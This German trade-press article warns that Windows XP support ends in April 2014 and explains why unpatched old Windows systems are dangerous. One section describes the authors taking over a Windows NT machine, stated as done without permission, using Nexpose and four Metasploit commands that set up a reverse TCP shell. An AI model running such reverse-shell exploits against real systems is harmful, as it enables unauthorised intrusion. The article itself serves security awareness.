Technikaffine Benutzer aus der Kategorie "Ich brauche immer das Neueste" betrachten ihre Windows-Systeme eher unter Aspekten wie:
-
Gibt es schon die richtige Software, die die Maschine auch wirklich auslastet?
-
Wurde die Sicherheitssoftware auf mein neues Wunschbetriebssystem hin überarbeitet?
-
Funktioniert die VPN/SSL-Verbindung ins Unternehmen auch mit meinem aktuellen System?
Anwender, wie die Industrie sie sich sicher wünscht. In der Realität gibt es jedoch sehr viele Nutzer, die möglichst gar nichts verändern möchte. Es geht zumeist nicht (nur) um die Unlust, neue Funktionen kennenzulernen - es ist die Angst, dass nach einem Wechsel etwas nicht mehr so läuft wie bisher oder der Rechner gleich ganz aufgibt. Ganz im Sinne der Devise "Never change a running system." So vergeht Jahr um Jahr und die "alten Kisten" unter Windows 98, Windows 2000 oder Windows NT und vielleicht sogar Windows ME werden gehegt und gepflegt. Auch das zuverlässige "Arbeitspferd" Windows XP fällt so langsam in die Kategorie der Systeme, die mit der Begründung "läuft doch" ohne großes Nachdenken im täglichen Betrieb zum Einsatz kommen.
Das gilt auch für die direkten Verbindungen mit Netzwerken und dem Internet - hier ist jedoch der Punkt erreicht, wo es mit der Ruhe vorbei sein sollte. Alte Systeme, die weder regelmäßig gewartet noch mit Updates versehen werden, stellen eine akute Gefahr für die Sicherheit dar: Wir zeigen, warum es sträflich leichtsinnig ist, beispielsweise mit einem Windows-NT-System im Internet unterwegs zu sein.
Es ist vorbei: Windows XP läuft aus
Am 8. April 2014 endet auch der sogenannte "erweiterte Produktsupport" für die letzte Version von Windows XP mit Service Pack (SP3). Wer noch einen XP-Rechner verwendet und den Windows Update Dienst stets eingeschaltet hat, braucht sich um den Service-Pack-Stand deshalb nach wie vor keine Gedanken zu machen: Die Aktualisierung wird automatisch durchgeführt. Das ist auch der Grund, warum Anwender - bei aller Angst davor, dass ihr System "nach Hause telefoniert" und Microsoft angeblich zu viele Informationen über den XP-Rechner bekommt - auf keinen Fall die automatischen Updates abschalten sollten. Tun sie es doch, sollten sie wenigstens manuell sicherstellen, dass wichtige Updates und Patches auf ihr System gelangen. Wer auf Nummer sicher gehen möchte, kann durch einen Rechtsklick auf den Arbeitsplatz die "Eigenschaften" des Systems zur Ansicht bringen. Im obersten Informationsblock steht die Version, beispielsweise "Service Pack 3".
Sind Service Packs und Updates auch bei alten Rechnern wichtig?
In den Service Packs führt Microsoft eine große Anzahl von Korrekturen an seiner Software zusammen. Meist sind auch weitreichende sicherheitsrelevante Veränderungen integriert. Dazu gehörten schon bei SP2 für Windows XP:
-
Die Aktivierung der Firewall in der Standardeinstellung;
-
Das Hinzufügen des "Sicherheitscenter" zur Überwachung von Antivirus-Programmen;
-
Das Hinzufügen von Firewall und Update-Dienst.
-
Zudem wurde eine tief im System verankerte Einstellung deaktiviert, die dafür sorgte, dass Benutzer, die über das Netzwerk auf den XP-Rechner zugegriffen haben, immer automatisch (!) als "Gast" authentifiziert wurden.
Da der Gast-Account zugleich auch deaktiviert wurde, war das System in dieser Grundeinstellung deutlich sicherer gegenüber Fremdzugriffen.
Wichtig: Solche tiefgreifenden Änderungen zugunsten der Sicherheit gibt es für alte Betriebssysteme - und damit auch für Windows XP - nicht mehr. Hier lauert einer weitere Gefahr: Auch die Installations-Medien der Betriebssysteme werden üblicherweise mit dem aktuellen Service Pack ausgeliefert. Wer also mithilfe der Wiederherstellungs-CD einen alten Marken-PC wieder neu aufsetzt, arbeitet möglicherweise auf einem sehr alten Softwarestand. So haben wir testweise einen mittlerweile reichlich "verstaubten" Dell Dimension 4500 mit der Original-CD wieder aufgesetzt, der danach ein Windows XP auf dem Stand von SP1 besaß. Wer dann vielleicht aus Bequemlichkeit oder aus Angst vor Ausspähung die "Automatischen Updates" deaktiviert, begibt sich in sehr große Gefahr - die oben aufgeführten Sicherheitslücken erfüllen leicht die Kategorie "Scheunentore".
Ein weiterer Angriffspunkt: Design-Unterschiede
Aus heutiger (Sicherheits-) Sicht wirken viele Standardeinstellungen von Windows XP förmlich "steinzeitlich": So besitzt der Benutzer eines XP-Computers in der Grundeinstellung üblicherweise Administrationsrechte und kann damit alle Parameter des Systems beliebig verändern. Folglich hat jedes Schadprogramm, das wissentlich oder eher unwissentlich vom Benutzer ausgeführt wird, diese hohen Zugriffsrechte ebenfalls.
In vielen Unternehmen wurden den Domänen-Benutzern zudem häufig lokale Administrationsrechte eingeräumt, da ansonsten einige Funktionalitäten im Zusammenspiel mit externer Hardware nicht einwandfrei arbeiteten. Beispielsweise war die anfängliche Synchronisation von Palm-Handhelds ohne Administrationsrechte eine Art "russisches Roulette" für die Outlook-Daten. Warum arbeiten aber auch heute die meisten XP-Systeme noch mit diesen hohen und damit riskanten Zugriffsrechten?
-
Hohe Zugriffsrechte waren zumeist ein Zugeständnis an die vielen Programme, die aus der NT/2000/98/ME-Welt direkt auf Windows XP ausführbar bleiben sollten.
-
Allerdings gab es bereits seit Mitte der 2000er-Jahre eigentlich keinen logischen Grund mehr, dem Benutzer so hohe Zugriffsrechte einzuräumen.
-
Viele IT-Professionals in den Unternehmen warteten da bereits auf einen Betriebssystem-Nachfolger und nahmen kaum noch Änderungen an den Grundeinstellung der XP-Systeme vor. Diese Systeme sind zum Teil heute noch im Einsatz!
Dieser direkte Nachfolger - das eher unbeliebte Windows Vista - war zwar deutlich sicherer, aber dadurch auch beinahe "unbedienbar": Die selektive Zugriffssteuerung UAC (User Account Control - Benutzerkontensteuerung) mit dem sichertechnisch sehr guten Prinzip einer virtueller Registry zur Aufnahme von Programmstammdaten wurde erst mit Windows 7 wirklich einsetzbar. So verwundert es kaum, dass auch Windows Vista bereits in der "Rente des Supports" angelangt ist - auch wenn dieses System lange nicht so unsicher ist wie seine Vorgänger
Wissen und handeln: Wichtige Termine
Trotzdem ist es wichtig zu wissen: Auch der Support für Windows Vista Service Pack 1 (SP1) endete bereits am 12. Juli 2011. Vista-Benutzer müssen, um weiterhin sicher arbeiten zu können, auf das Service Pack 2 (SP2) aktualisieren. Im April 2012 endete dann der so genannte "Mainstream Support" für Windows Vista SP2. Der Windows 7-Vorgänger befindet sich, wie Windows XP SP3, nun im erweiterten Produktsupport. In dieser Phase kümmert sich Hersteller Microsoft nur noch um "sicherheitsrelevante Aktualisierungen". Am 11.04.2017 endet dieser Support für Windows Vista endgültig, wie der Webseite "Product Lifecycle" von Microsoft entnommen werden kann.
Der Support für Windows XP SP2 endete schon am 13. Juli 2010. Die Unterstützung für das letzten Service Pack 3 endet, wie bereits erwähnt, am 8. April 2014. Da es für die wenig verbreitete x64-Variante von Windows XP kein Service Pack 3 gibt, endet die erweiterte Produktunterstützung für SP2 ebenfalls im April 2014.
Nicht, dass der Eindruck entstünde, dass das Produkt ab diesem Tag nicht mehr funktionieren würde: Das jeweilige Windows läuft weiter - nur eben ohne Updates durch den Hersteller und mit dem entsprechenden Sicherheitsrisiko.
Soweit wird es Microsoft nicht kommen lassen, oder?
Stellt Microsoft im April 2014 den Support für Windows XP endgültig ein, so heißt dies nichts weniger, als dass für Sicherheitslücken, die ab diesem Zeitpunkt entdeckt werden, keine Korrekturen mehr vorgenommen werden. Öffnet ein klassischer "Buffer Overflow" beispielsweise einem Angreifer Tür und Tor auf dem Computer, kann der Benutzer nicht mehr auf Hilfe von Microsoft hoffen. Der XP-PC bleibt somit für immer ungeschützt, sofern nicht dieAnpassung einer Firewall-Regel oder die Deaktivierung der betreffenden Softwarekomponente eine Notlösung bieten.
Ein Beispiel aus der täglichen Praxis: Unter der kryptischen Bezeichnung "2387149 (MS10-074) - Sicherheitslücke in Microsoft Foundation Classes (MFC)" wurde im Sommer 2010 eine Sicherheitslücke in den Dateien mfc40u.dll beziehungsweise mfc42u.dll entdeckt. Diese wurde für alle "aktuellen" Windows-Versionen geschlossen, nicht jedoch für Windows 2000. Der Support für den XP/2003-Vorgänger endete bereits am 13.07.2010 und folglich gab es keine Korrektur gegenüber der Remote Code Execution-Problematik mehr.
Virenschutz für alternde Windows-Rechner
Eine weitere, für viele Anwender äußerst wichtige Software, stammt ebenfalls aus dem Hause Microsoft und wird für Windows XP SP2 32-Bit und höher geliefert: Microsoft Security Essentials. Hierbei handelt es sich um eine einfache, kostenfreie Anti-Virus-Software für Privatanwender und kleine Unternehmen. Es darf davon ausgegangen werden, dass Microsoft auch bei diesem Programm die Unterstützung für XP pünktlich im April 2014 einstellen wird.
Antivirus-Programme laufen zwar auch ohne die regelmäßigen Aktualisierungen der "Viren-Definitionsdatenbank" weiter, jedoch kann die Software auf neuere Bedrohungen nicht mehr reagieren. Viele Hersteller von Security-Lösungen wie beispielsweise Kaspersky oder AVG kündigen auch den Produkt-Support ihrer Programme relativ zeitnah zur Einstellung des Supports durch Microsoft ab.
Sophos fällt hier insgesamt positiv auf - der Hersteller liefert auch heute noch Antivirus-Lösungen für Windows 2000 Professional- und Server-Systeme SP3 und höher aus. Sicherheitssoftwarehersteller haben es jedoch extrem schwer, für ein alterndes und immer unsicher werdendes Betriebssystem eine entsprechend sichere Antivirensoftware zu liefern. Das Schutzprogramm kann sich einfach nicht mehr darauf verlassen, dass die darunterliegende Softwareschicht wirklich verlässliche Informationen zurückgibt.
Irrglauben: "Hacking ist kompliziert, da passiert schon nichts!"
Das "Hacking", das unerlaubte und möglichst unbemerkte Eindringen auf einen PC oder in eine Netzwerkstruktur, gilt gemeinhin als "hohe Kunst" in der IT. Hohes technisches Wissen, gepaart mit krimineller Energie, wird den Personen nachgesagt, die sich dem Hacking verschreiben haben.
Wir haben uns einmal selbst daran versucht, ein altes, aber noch produktives Windows NT-System, ohne die passende Erlaubnis und ohne das Wissen der Administrationsberechtigung, über das Netzwerk übernehmen zu wollen. Die Standard-Applikationen für derlei "Penetration Testings" sind Metasploit und Nexpose von Rapid7. Für das Herunterladen, das Aufsetzen der virtuellen Maschine mit Windows Server 2003 Betriebssystem und den ersten Einblick der Software benötigten wir zirka vier Stunden.
Erschreckend einfach: Welche Sicherheitslücken die Software auf einem Zielrechner als "wahrscheinlich" einstuft, gibt Nexpose freizügig aus. In der Konsole von Metasploit mussten wir anschließend lediglich vier Eingaben vornehmen, ehe wir direkt in der Eingabeaufforderung des NT-Rechners landeten. Mit "set PAYLOAD generic/shell_reverse_tcp" wird die gewünschte "Sicherheitslücke" anvisiert, mit "set LHOST 10.117.21.123" definierten wir unsere Maschine als ausführenden Angreifer und mit "set RHOST 10.117.18.104" das Ziel. Das Kommando "exploit" führt den gewünschten Befehl aus und keine zehn Sekunden später konnten wir alle administrativen Befehle auf dem Zielrechner ausführen!
Das hätte genauso gut ein Windows 2000 oder XP-Computer mit fehlenden Patches sein können, wie das Internet-Video "Shell Root" auf YouTube eindrucksvoll zeigt. Uns geht es bei diesem Hinweis natürlich nicht darum, dem strafrechtlich relevanten "Hacking" Vorschub zu leisten; eher möchten wir Sie als Leser auf diese "reale Gefahr" hinweisen und zeigen, wie leicht es ist, ein solches System zu kompromittieren.
Nicht vernachlässigen: Applikationen auf dem Stand halten
Ohne Frage ist das Betriebssystem bezüglich der Betriebssicherheit die wichtigste und erste Adresse. Die auf dem Betriebssystem ausgeführten Programme dürfen jedoch in der Gesamtbetrachtung auf keinen Fall vernachlässigt werden. Auch wenn das Windows XP an sich auf dem neuesten Stand gehalten wird, so kann die Verwendung des Internet Explorers 6, eines restlos veralteten Firefox 3.5 oder eines ebenfalls "ergrauten" Adobe Acrobat 7 für Schadprogramme das sprichwörtlich "gefundene Fressen" sein. Fast jede Software animiert den user regelmäßig, Aktualisierungen einzuspielen, doch das hilft wenig, wenn dieser stets auf "Nein" klickt.
An diesem Verhalten des unbedarften Benutzers ist die IT-Branche jedoch selbst schuld. Wie oft hat die IT-Presse darüber berichtet, dass es ein Fehler war, auf "Ja" zu klicken? Wer einst beim "Loveletter" auf "Nein" klickte, der hatte kein Problem. Erst in der jüngeren Vergangenheit sind die Entwickler, beispielsweise von Googles Chrome, dazu übergegangen, die Updates immer und automatisch einzuspielen. Die Wahrscheinlichkeit, dass etwas nicht mehr ordentlich funktioniert, ist weitaus geringer, als die entstehenden Sicherheitsrisiken.
Andererseits trifft die Produkt-Manager und Marktstrategen eine nicht zu unterschätzende Mitschuld: Die ständige Erhöhung des Versionszählers sollte nicht darüber hinwegtäuschen, dass neue Features scheinbar höher in der Bedeutung sind, als die Erstellung von möglichst fehlerfreier Software.
Und immer noch ganz oben
Die Annahme, dass Windows XP schon vollkommen "out" ist und sich eigentlich kaum noch jemand dafür begeistern dürfte, ist leider ein Trugschluss. Trotz des überaus beeindruckenden Verkaufserfolgs von Windows 7 gelang es dem deutlich jüngeren Betriebssystem laut Wikipedia erst im Oktober 2011, das alte XP in Marktanteilen zu übertrumpfen. Man darf nicht vergessen, dass Netbooks auch im Jahr 2010 noch mit XP ausgeliefert wurden und dass in vielen Windows-7-Computern ein altes XP im "XP Mode" schlummert.
Für all diese Geräte, seien sie nun physikalisch oder virtuell, gilt der 8.April 2014 als der letzte sichere Arbeitstag - und damit als der späteste Zeitpunkt für einen Wechsel. Zumindest sofern sich Microsoft nicht noch einmal gnädig zeigt - dies ist, nach immerhin 4548 Tagen Support, jedoch eher unwahrscheinlich. Kaum ein Hersteller bietet fast zwölfeinhalb Jahre Unterstützung für eines seiner Produkte an - ein Blick auf die Apple-Betriebssysteme zeigt da beispielsweise ein ganz anderes Bild. (Computerwoche)